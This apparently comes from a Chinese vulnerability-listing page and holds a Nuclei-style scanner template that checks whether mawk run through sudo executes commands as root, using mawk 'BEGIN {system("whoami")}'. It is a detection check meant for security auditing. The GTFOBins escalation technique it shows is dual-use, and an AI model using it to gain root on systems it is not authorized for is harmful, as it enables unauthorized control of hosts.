privesc-mawk: mawk - Privilege Escalation

日期: 2025-08-01 | 影响软件: mawk | POC: 已公开

漏洞描述

mawk is an efficient and fast implementation of the AWK programming language. It is designed to be smaller and faster than the original AWK implementation, making it suitable for large data processing tasks. mawk is commonly used for text processing and pattern scanning in shell scripts and command-line environments.

PoC代码[已公开]

id: privesc-mawk

info:
  name: mawk - Privilege Escalation
  author: daffainfo
  severity: high
  description: |
    mawk is an efficient and fast implementation of the AWK programming language. It is designed to be smaller and faster than the original AWK implementation, making it suitable for large data processing tasks. mawk is commonly used for text processing and pattern scanning in shell scripts and command-line environments.
  reference:
    - https://gtfobins.github.io/gtfobins/mawk/
  metadata:
    verified: true
    max-request: 3
  tags: code,linux,mawk,privesc,local

self-contained: true
code:
  - engine:
      - sh
      - bash
    source: |
      whoami

  - engine:
      - sh
      - bash
    source: |
      mawk 'BEGIN {system("whoami")}'

  - engine:
      - sh
      - bash
    source: |
      sudo mawk 'BEGIN {system("whoami")}'

    matchers-condition: and
    matchers:
      - type: word
        part: code_1_response
        words:
          - "root"
        negative: true

      - type: dsl
        dsl:
          - 'contains(code_2_response, "root")'
          - 'contains(code_3_response, "root")'
        condition: or
# digest: 4a0a0047304502203f783ca6763496591d9cf18dbe228213ac61e5a09e4dc0496e74f77f2fca085e022100f5dee73274c1e09c4f6b92bda070459bfdd5bb87eaf2ee1207af09e9432005e5:922c64590222798bb761d5b6d8e72950